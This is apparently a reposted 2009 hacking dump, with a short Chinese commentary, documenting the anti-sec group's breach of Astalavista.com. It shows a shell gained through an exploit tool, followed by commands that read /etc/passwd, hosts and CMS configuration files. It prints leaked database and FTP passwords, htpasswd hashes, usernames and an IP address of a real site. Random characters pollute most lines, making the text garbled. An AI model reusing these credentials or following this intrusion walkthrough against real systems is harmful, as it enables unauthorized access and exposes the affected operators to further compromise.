里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
u4 L0 o/ s8 Z+ f
7 V% e2 y! {3 V" d) P% S[root@front3 ~]# curl -I litespeedtech.com7 H3 w+ G- Y2 P
HTTP/1.1 200 OK/ l& Z# E2 _0 |2 R: ]3 x( X' p3 m
Date: Fri, 05 Jun 2009 22:54:51 GMT
" `$ b+ S% v) R8 p$ n/ C0 ]* cServer: LiteSpeed5 |% F* N$ T1 E1 ^) _
% H" v. i$ O, R5 T: w6 l
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-! P: ^' c1 R# g. @& C
1 j2 B2 d6 ^4 [9 m ]9 i有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
2 l- T8 l2 `0 N* R: p
- V _1 ^9 [; A5 J, L7 i0 J" n
& G4 \) F0 ~2 f5 R3 a/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
" V" O/ i$ r+ {+ f2 Z9 S/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \4 v1 s$ c. H/ d7 v0 _
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \7 N+ r+ p/ R8 v2 R) Y) G c
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /2 p& ~) Y3 _9 T" H
\/ \/ \/ \/ \/ \/ \/
4 }' \. A9 d& K! m* T6 D+ | The Hacking & Security Community
: K8 N: r0 w$ a: X1 m7 W[+] Founded in 1997 by a hacker computer enthusiast# H; w" I: }' ?0 _. @6 v
[-] Exposed in 2009 by anti-sec group( p3 {4 m* `$ @$ L
8 I9 h4 C" y( y7 W8 mFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
2 d8 s5 M- t( ~! v5 ^ |2 k& e>> 03. Who’s behind the site?
5 U. ~ q4 q0 W' K/ I>>8 B2 ~% k$ z) }8 q9 ]
>> A team of security and IT professionals, and a countless number of contributors from all over the world.' T3 f' t* X0 z2 ~% |
) \4 l: E# i/ o1 t3 z+ Q% c, W
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?) ^ B6 ^- i5 ~# p7 s+ e
>>( y {: g* M# b# u; u a
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
, n9 Z4 u/ a0 c" emilitary institutions.
& ~) r9 T% \( M0 x>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.' S3 W- Z9 Z" x- O1 ~
" I0 b4 S: I, EWhy has Astalavista been targeted?
3 Y" ^# d' G% o5 ^
: r# Q+ e+ B+ N/ v2 h" t, dOther than the fact that they are not doing any of this for the “community” but2 @' K* a7 z( o* d1 e
for the money, they spread exploits for kids, claim to be a security community
$ P# l" G6 p5 f7 z- D3 U0 K. N$ f(with no real sense of security on their own servers), and they charge you $6.666 C( o: u* m+ x h1 ]
per months to access a dead forum with a directory filled with public releases
$ e3 o. ?( x1 c' Fand outdated / broken services.% U+ C+ ]* y2 Y5 S) G1 V
+ i; T# _5 ^( C7 Y2 l5 y0 PWe wanted to see how good that “team of security and IT professionals” really is.) B' B# ?5 j* z$ H) p9 S
9 M Y- @2 ?1 \" H+ m3 }" ~
Let’s begin.' U: u# z# M. V+ o( b7 g* w0 R
5 R8 F7 j- e0 R6 }. janti-sec:~# ./g0tshell astalavista.com -p 80
7 A, @/ \- w3 D; G, i$ h* m[+] Connecting to astalavista.com:803 }$ N# \0 z' B6 j+ e/ k" _) w, j
[+] Grabbing banner…
9 ^" z# L% I" d8 M4 I4 s) kLiteSpeed) X+ r0 a: M9 |) l! J$ K0 ^
[+] Injecting shellcode…# S0 n6 S+ v8 g/ _
[-] Wait for it
' ]* u4 E7 s+ \( _5 R3 {- _' O1 q# a# W
[~] We g0tshell! K. t; K% a) p& p, Q5 P
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux4 `4 x( j$ ^6 N: {$ u$ p
ID: uid=100(apache) gid=500(apache) groups=500(apache)
2 _& j1 ^9 h$ l W7 }0 C. H
, i# w+ M! C: A% ish-3.2$ cat /etc/passwd# ]8 Q: ~- V( M# o' f5 V5 h
root:x:0:0:root:/root:/bin/bash; j# N% p+ c$ E2 `, _- y
bin:x:1:1:bin:/bin:/sbin/nologin# W1 B" S( c+ A: q u4 ~
daemon:x:2:2:daemon:/sbin:/sbin/nologin
- T- V/ w/ M" Iadm:x:3:4:adm:/var/adm:/sbin/nologin( v ^6 S5 X! F# r
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
* k- ^0 [; E7 i7 H. \* _sync:x:5:0:sync:/sbin:/bin/sync
$ X1 R/ k: s1 U' D* ?shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown2 h7 y" |: C3 `' q% v2 z( G6 X3 @
halt:x:7:0:halt:/sbin:/sbin/halt; L- G$ v. x7 }( x- f. E% U O
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
6 P" R- b, W$ W! V# V9 }/ |* O- |news:x:9:13:news:/etc/news:& X1 @, G8 u; ~- e, \8 c2 j" @
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin* I% `) l6 |2 E' K, X2 ?; |
operator:x:11:0 perator:/root:/sbin/nologin
- O/ V$ N6 s" ]) wgames:x:12:100:games:/usr/games:/sbin/nologin
0 \+ a5 X# D9 c: K+ L5 m0 agopher:x:13:30:gopher:/var/gopher:/sbin/nologin
) Z' t3 j9 A6 zftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
4 ^0 R& l& S* A" Mnobody:x:99:99:Nobody:/:/sbin/nologin
9 x. v$ d3 B: @% ?4 j7 [" Arpm:x:37:37::/var/lib/rpm:/sbin/nologin
. F" ^* m: P/ a( b( S; Ndbus:x:81:81:System message bus:/:/sbin/nologin
$ X9 h% g- w( C& knscd:x:28:28:NSCD Daemon:/:/sbin/nologin$ e" s6 W- ^! h' p: Q. ]) u( u$ a
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin; m2 q9 @) Y* S" L
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
D! f2 S, O% n1 A! n& P% Bvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
$ F2 O; Q; V! g! N$ `haldaemon:x:68:68:HAL daemon:/:/sbin/nologin# z( j4 n/ ?" o
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin, J/ M( c2 ?/ y+ ~9 A+ `% ?
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
# v4 J- A' k- x Dnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
! c5 g- Q2 E9 T; T3 X S2 ~sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
! V$ d. P E1 Q# v& o- [pcap:x:77:77::/var/arpwatch:/sbin/nologin
^" g5 b9 z3 ] d! o( anamed:x:25:25:Named:/var/named:/sbin/nologin6 d" H) a4 k/ s- H
apache:x:100:500::/var/www:/bin/false5 u' Y, \, E$ l8 F
diradmin:x:101:101::/usr/local/directadmin:/bin/bash; N/ v2 p! G( Z) f9 O. I1 t4 n
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
" @- ^* m% t/ i) Y) V+ \' _webapps:x:500:501::/var/www/html:/bin/bash ?7 R' S' _* q* X1 J" u
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
: F, J b2 f0 s6 `, padmin:x:501:502::/home/admin:/bin/bash
5 X1 w% J! y9 D- V3 Y: G3 ]$ @jon:x:502:503::/home/jon:/bin/bash6 b9 s% M( X$ c. f0 k- m
com:x:503:504::/home/com:/bin/bash
6 |' F, z0 g: i5 Untp:x:38:38::/etc/ntp:/sbin/nologin. _5 c' k a9 U( [+ N8 v x
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin/ M" h7 X0 ?0 e7 n$ C/ v% }
astanet:x:504:505::/home/astanet:/bin/bash
7 p" [; D0 n1 savahi:x:70:70:Avahi daemon:/:/sbin/nologin/ B' X8 A8 Y. y) c! X: |/ s( K
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
3 E( u, S2 Z2 R
. N* {/ e0 L0 u' Msh-3.2$ cat /etc/hosts/ g Y8 E3 U6 b; ?+ v5 F9 d
# Do not remove the following line, or various programs+ L' b1 G" ~9 p- }2 C0 w+ Z
# that require network functionality will fail.. H8 H# C$ p' d5 z& {* }
127.0.0.1 localhost.localdomain localhost
* T% M) j: i) W+ Y::1 localhost6.localdomain6 localhost6
9 M& c# B8 g) ]% i5 C; L80.74.154.172 asta1.astalavistaserver.com
: Q( Y& S1 O2 ]6 y& U
9 M/ b1 M' M5 r" E- k) Nsh-3.2$ pwd
: j; ^0 K! `* g4 ?/home/com/public_html
# g$ r9 M- } E
- T/ E" z- b8 N: ^% T i6 E+ ]sh-3.2$ ls -la
) ^8 U) B* i( Z" {. Ttotal 184601 P8 F, S3 a; R1 F
drwxr-xr-x 30 com apache 4096 May 28 17:06 .8 t4 i# F6 s* W6 x5 _) t
drwx–x–x 11 com com 4096 Jun 25 2008 ..$ J: h& B% K% p. ^3 T
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
9 i' _( u8 @) Hdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
9 U9 {2 C% |' }( {# Rdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
3 G% X" ?: p& I$ H, @" idrwxrwxrwx 2 com com 4096 May 19 00:50 config0 |% M# S9 Q7 U m
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
! S2 c/ U' z$ Y0 j Bdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
6 A7 Q! }: q W- ?$ ^$ zdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing e) T* i! A2 D$ S% E8 _' }; x
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo$ ?# Z ~0 n5 s P5 o6 A
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
/ n( B) p$ ^+ m8 \, P-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
. a4 A1 y* A/ f. gdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd. y- c* Y% \) W) H5 @8 \4 x3 Z. d' _
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
4 T! i# d9 v$ `+ D4 h-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
. X7 T% j+ y5 w, sdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
! N6 D' L$ \& g% ~! t-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
" S* q' i# O* S: g7 |! [3 v-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
/ G1 ]4 B) f" e B2 l; D-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak* t* m T1 H$ a a2 P) t6 Q
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
0 t" G+ O8 V5 K3 ldrwxrwxrwx 14 com com 4096 Feb 2 19:29 images g) K2 C2 Y( F9 X& {+ J2 E
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php: J" f2 f" t" N' N% Z. m. Z
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer& `) O( k2 g9 i1 w
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
- b- i2 O9 z+ f8 {& g' Wdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
4 W& O) F- f$ U! G X x; Ndrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
4 T. r* }* r9 _/ Pdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications; U+ G. r' J, R. U. P
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
/ A3 _% a; G" {" ?6 M0 M5 v) sdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
1 g6 L, A. B' K8 qdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
+ |+ i4 W. s3 {4 j* P/ x0 \) ndrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old7 M2 y3 P6 I6 b6 E) D$ U6 ^) a
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy) U- p+ }: V/ c6 k3 {
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
j8 H! b) J& ^8 T-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
4 i, s; Y$ `3 o6 a% y8 s-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
8 o5 w4 h1 y7 K- ]; o-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
n/ s2 T8 P# X$ Ldrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
0 i* [* N0 r* Odrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
; I8 W+ X6 ^" }drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
% g& O6 z7 I0 V3 q: H4 O N/ |/ X
; g1 L2 |; X7 J3 [$ psh-3.2$ head -20 index.php. [ {. [, D% {/ t
<?php
; [: k. @' s; t# \/ V. x% a
, m' r; @. s/ u7 F" O5 L" O/**
4 I! T9 |' Z( n4 F6 R* The main page for the CMS
) V) _0 {9 b3 R, g; C% y* @copyright CONTREXX CMS - COMVATION AG* L2 c) Z" p7 e |! X x t3 l2 b: v
* @author Comvation Development Team
/ T- _4 S3 M5 N: x, e% o/ q* @version v1.0.9.10.1 stable+ R P! `5 O! c
* @package contrexx& f" N' m7 c2 W v2 S/ s. p. V6 A9 K
* @subpackage core1 r9 P4 q9 @& j8 W6 k+ f8 E5 f# z) X
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
_7 m% E) g9 c$ u% v6 ?: l+ c* @since v0.0.0.0
4 v7 O' I, f1 Q- e! W! o A* @todo Capitalize all class names in project
2 w( D% H& c7 z. W7 T/ u* @uses /config/configuration.php- ^* g8 r. O4 \4 S' W8 R
* @uses /config/settings.php3 { z9 c1 ^7 y7 p
* @uses /config/version.php
: u5 e9 E1 l( S: H$ o6 `! H* @uses /core/API.php9 L4 J2 j% j4 _* o, W" i
* @uses /core_modules/cache/index.class.php
7 Q0 D/ d; L A ]* @uses /core/error.class.php
/ l) p8 C+ X! s8 s" p* @uses /core_modules/banner/index.class.php! x+ R' s) K: ?/ m* K( B: s
* @uses /core_modules/contact/index.class.php6 E( D4 ]/ i' x, H+ m& T* d E
; g# z4 ^) d! H6 T' ]$ ^) gsh-3.2$ cd config/' z) Y. H0 [3 c4 U$ ]* i$ D9 { h
sh-3.2$ ls -la) x4 M% J3 G7 x+ e$ h4 N1 q) `* ~
total 32/ Q" V0 Z0 g! L( t0 k
drwxrwxrwx 2 com com 4096 May 19 00:50 .' ^9 C& q8 D. b$ j
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; ~% x; l" e8 L, R7 S, l-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
9 G& w6 O B1 n9 |9 S( r* Q/ y-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
2 F) ?6 I! }% E; r( q9 c2 v-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
1 b$ I$ n, o8 |8 ^, M-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
x1 b, j2 R9 O$ p% k
) R9 L6 {6 A2 S4 esh-3.2$ cat configuration.php1 x! {# J3 `: m. C" J3 q9 }
[snip]
3 q, d; `! H& [: U Q, E2 l$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost3 ?" b$ s. t+ N% O
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
" w( `% e7 P5 p2 E5 l$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
0 H3 t. F0 s5 x6 |$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
: R5 S3 B6 V' o$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
/ ?+ t3 v4 { W" q2 T9 ^& [$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)) l# j0 `$ P$ {2 g9 n, O8 ~
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
8 n/ n1 k! K5 A$ s7 d[snip]+ C; n' T: C9 `. b9 D' x! E* Z
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false, p( T. i! M* W6 I: U. \
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode* N, |9 |- U+ r! o
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
* r p- w& s6 d$_FTPCONFIG['port'] = 21; // Ftp remote port
1 Z' f$ t9 u( n0 X! W' @) k$_FTPCONFIG['username'] = ‘链接标记[email protected]’; // Ftp login username. H5 L- D% p/ P+ n6 s
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
! R" n5 n2 G) a" G; W3 e9 B$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
1 n/ T: H$ K ?3 C; |7 S6 e
5 T1 ^0 |- u. X( ]0 @sh-3.2$ cd ..
! `9 p5 k: H& ~5 vsh-3.2$ cd dvd/9 B2 o* U1 m( V& g: l: ` G* X
sh-3.2$ ls -la
4 x; L, x) A/ M: N5 Q& F: @ j! rtotal 2913780: x: u- ~% ]8 o$ Z
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
4 m* Z; ^) h% e( Jdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ I( x! b" A6 C- F k% u6 X-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
y5 N0 l; G5 M# V8 e1 M-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar! ?" o, P7 ` l1 @
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar4 c6 V( |- q2 T8 j$ T) P' d' c2 I
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
* I, e+ v- C K6 i( |. _5 _, `* |) y) _) ^
sh-3.2$ cat .htaccess
+ u0 \. \ a1 B1 i7 i, CauthType Basic7 L% a. q1 X: f5 b6 x/ S
authName DVD
/ \& a9 P( A% ?$ n9 Q! S7 q$ eauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd' a5 [" I. b i! N. \) R
require valid-user1 e+ H5 s% S. t8 I I
) ^9 D3 c: S) q* F0 g' p
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
) ] s* D1 H( m) y! G2 F# \, r7 bDVDdownload:CRD8cuY6.MPT69 F# ]% G) v- ~' E% C* h
DVDdownload2:CR8a36.wluFMg
! D' ?* r' ~- h* Z8 m2 E* g* x1 X2 A5 e( v; q* R) Z
sh-3.2$ cat test.php3 ]% I8 d) }# f( v$ g* K/ S: l p# I* U
<?php3 A: D% M; u9 I. _4 z0 o/ B
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’; `$ r" x, u$ _- N" g. M
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));5 s' I* l `1 B% X2 H1 x. t
echo $url;
, C% s+ s) |7 r0 D4 T* e3 w?>8 l8 |0 N y# n$ P+ G, P
& y' r D0 K- C& e
sh-3.2$ cd modifications/
3 K! r5 ]; ]1 Ksh-3.2$ ls -la
3 t' Z# N5 w1 o2 ^total 32, w& t! E. q. l# F
drwxr-xr-x 8 com com 4096 May 11 12:48 .1 i3 s& m8 w u3 N5 M: B$ \
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- P; M) u. i* {: Z& pdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng- B: }3 A5 u" C' l! s
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs& o5 P7 T I7 d! Z. ]1 T) l
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
, C5 t; G9 N- j# f% i% @! q' F2 V& cdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
- q0 o8 J' Y$ n# F( [drwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 ?3 h a3 b4 E' J9 G
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp7 q5 P% a! \4 r9 e: ]$ \3 Z
; n5 W0 A; f) {, |+ Xsh-3.2$ ls -R5 M2 Q I) x$ o, j8 p/ k
.:# u' J/ r3 J6 m; U4 ` T
com_avtng cronjobs onlinetools pjirc search _tmp$ }% v# F2 [" ^) `# `) r6 b
) f( ]& ?! x, _6 ?2 e- k$ D$ P, r8 p
./com_avtng:2 M2 L) e. V( x n
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts1 i# C" n. k6 S4 d4 a5 p/ k% H
u! ~) y' G( V. \./com_avtng/scripts:
, T* m5 i- J: npopunder.js
! ^4 W7 k# V) ?. q, U! `
0 j; i! s( B* ]3 O7 e; O9 j1 f./cronjobs:
6 S6 u& G) L8 W; N, {! c% Yexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
2 W" Q, J& k) q* B: {+ W1 d0 Q) Y! C- u. o l, q, N6 U& W o! G
./cronjobs/tmp:
6 S. l9 v% E: @3 [contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
0 ^* O/ r/ c [8 d7 b) s# f6 c1 X* k
- Y, e1 T# J: S3 U./onlinetools:
9 i9 z% }, h" \& X0 jindex.php$ A. M& U$ a. b* u- a' w
( b! n7 V0 v# `5 A, N9 U; {./pjirc:! j% }1 K7 J; l9 v e
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
. p; k! G b2 F0 H2 l+ l# U) b. }: ]AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt! d J7 ^/ B9 t& b" _
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd; s2 w: a+ h; Z" |' g$ Q
8 `! I9 h/ D* |' z0 b2 L( e7 s
./pjirc/img:
$ u$ Q2 n o* Y8 [: @1 }ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif' m. B1 ]9 ?" }3 n8 E
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif $ P$ w. q9 n: U( W2 D
verre-eau.gif
: B1 v9 {8 g+ Targh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif ; N' W8 b$ z9 ?1 G8 V& g9 R7 V) L
verre-vin.gif* N& m6 U7 |/ H/ l. R6 n6 g
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
2 o0 L9 C8 V ]. qbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif4 Q2 L! U+ R C) P4 ?
9 `3 d* a0 \7 e% C( j4 _
./pjirc/snd:) |! S# A) x a7 \6 i0 _
bell2.au ding.au
1 C" U7 D+ f. K4 o+ l K) V8 Q: L R% m' K
./search:& L5 r$ C+ Z1 N$ F
searchEngines.php search.php
; |2 G1 r' y& J% Z' ?0 ?: S# `. U
+ _7 u; A3 u% Q2 e0 ^. b) ^./_tmp:
; j- u0 c2 Q+ e7 P, ~1 L$ D" mdefaultPorts.php defaultPorts.txt1 N- O! ?+ N8 w3 [: {
" w, d8 B A O0 j2 c) h
sh-3.2$ cd cronjobs/
4 @% f- h5 f& x( }' Tsh-3.2$ cat exploits.php
/ I1 u% B0 P0 e- D! W, `; c[snip]$ u/ g+ }2 i9 y+ g
$categories = array();
: L6 N+ Q- k! S$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
8 p) A; L* ?7 t' x3 H% f$expolits = file($milw0rmFile);4 p4 _/ a+ V' t6 V# y) x
$comExploits = array();
) a, @! H# z0 q- M9 B[snip]
# [0 w9 n% ^& h3 i r( @% a9 o& f// manage data
0 B! r' X1 P6 |/ o/ Ifor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640: @1 I1 S9 A- z' P! d( f
* }0 c) M$ P9 m1 l // get path and title
) [! a. Q7 l! n# d- S1 a* M $expolits[$x] = trim($expolits[$x]);1 `* }, x7 j2 ?- I( k. J: h9 d
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));1 M' N0 @0 `% b0 |; [
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);$ u) r$ s; U6 ^7 M& L9 c1 V9 i
6 c) N8 e+ P5 i // check if file exists! C* t% u) i0 f. L1 d0 I& N; z
if (file_exists($path)) {/ F; U0 j8 t) [
* V3 N2 @0 X4 q& I$ |5 D U
$text = file_get_contents($path);
* k: y- C' k' o5 g& f
" A; g6 ~' j( V3 U ? // get content and date
" m8 R$ m- h, X4 D //$text = htmlspecialchars($text, ENT_QUOTES);
* f% C4 r- O, _) K: I $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));0 l4 `. g6 D! F: f5 ~# s3 l( K; x2 E
if ($tmptext != ”) {
8 K5 P i6 ~3 B $text = $tmptext;6 t! q3 T& `) D8 B8 |
} else {
4 i+ f, N/ h% Q, p4 A $text = addslashes(htmlentities($text, ENT_QUOTES));
2 f' V5 t0 C# Z" {" P4 E }
, r D) L6 V& i: B5 s: I5 x $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));3 b& F. U3 D0 a0 V! a q1 S
$tmp = explode('-', $date);
0 l7 b( [3 C. K' O $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
9 q* q" }. ^6 i! r% G. ^0 Q5 j $cat = getCategory ($path);
# v2 e, u+ z, T $ext = pathinfo(basename($path));
3 \; W! V0 s+ [3 J $ext = $ext['extension'];. b6 ~3 {: G# @' k+ a& k
$qStr = ”
" c6 p6 `* F J3 `' }" V Z SELECT `id`, R4 s; p& F/ f& Q/ s2 ?
FROM `contrexx_module_exploits`) M) W7 ]2 R$ q7 _5 u4 M
WHERE `title` = ‘” . $title . “‘
# H9 F3 E& q+ F AND `date` = ‘” . $date . “‘$ m3 i0 ]0 F: E1 T1 |% d) b' g
“;1 h7 `3 w4 T- T2 v# N$ |
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;3 g! O8 Y$ J3 @' o0 v/ n
$q = $_objDB->query($qStr);8 R" c0 i; o3 U9 b# M0 m
. G J8 g/ ^! j7 B, n$ { if ($q->numRows() == 0) {* C8 `& Z2 s5 v* H5 M0 x
. H; }- t' @5 H, L7 |- A! }
// prepare array
9 Q9 h7 o( C- d $comExploits[$x]['date'] = $date;6 h, B" w; r$ f& u- L5 P
$comExploits[$x]['title'] = $title;4 L( b' ? g+ D7 k# C
$comExploits[$x]['author'] = ‘milw0rm’;
+ _: F c3 b8 f$ s $comExploits[$x]['text'] = $text;
+ p( B6 f$ \* g* c& i8 z4 M0 { $comExploits[$x]['source'] = $ext;5 c( u' F& y0 m- o A
$comExploits[$x]['url1'] = ”;
$ X9 n3 {/ c' Q- N $comExploits[$x]['url2'] = ”;
: ~* U* v1 D$ c+ P2 z" s* A0 z $comExploits[$x]['catid'] = $cat;/ F( N1 d Y2 q; u9 E. u7 |
$comExploits[$x]['lang'] = ‘2′;
! J1 ~* A6 ^; R% m $comExploits[$x]['userid'] = ‘12′;
0 R! p" ?2 p0 Q# H $comExploits[$x]['startdate'] = ‘0000-00-00′;( U2 m( f ], _& q& t- f8 d9 ^, x
$comExploits[$x]['enddate'] = ‘0000-00-00′;" ^) H, \2 q5 `
$comExploits[$x]['status'] = ‘1′;
. V0 c. A) F0 I, g! d1 q/ t $comExploits[$x]['changelog'] = $date;, H5 s# ^; D$ G1 ^" [* q
' o! j8 L$ d* P; k
}8 q* i! J9 c ]" P" O
[snip]
- T- T, H& [6 G* Z- `' S2 D# M $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
% ?" U. w% e# G, K T# y. ]$ z<rss version=”2.0″>8 \& ~$ z# @# b" T
<channel>3 o' e& i+ P+ q, U
<title>ASTALAVISTA.com - Exploits</title>( M r' p! N1 ~- O% k
<link>http://www.astalavista.com/exploits</link>
. h: {% r3 n# w/ O <description>All availably Exploits.</description>
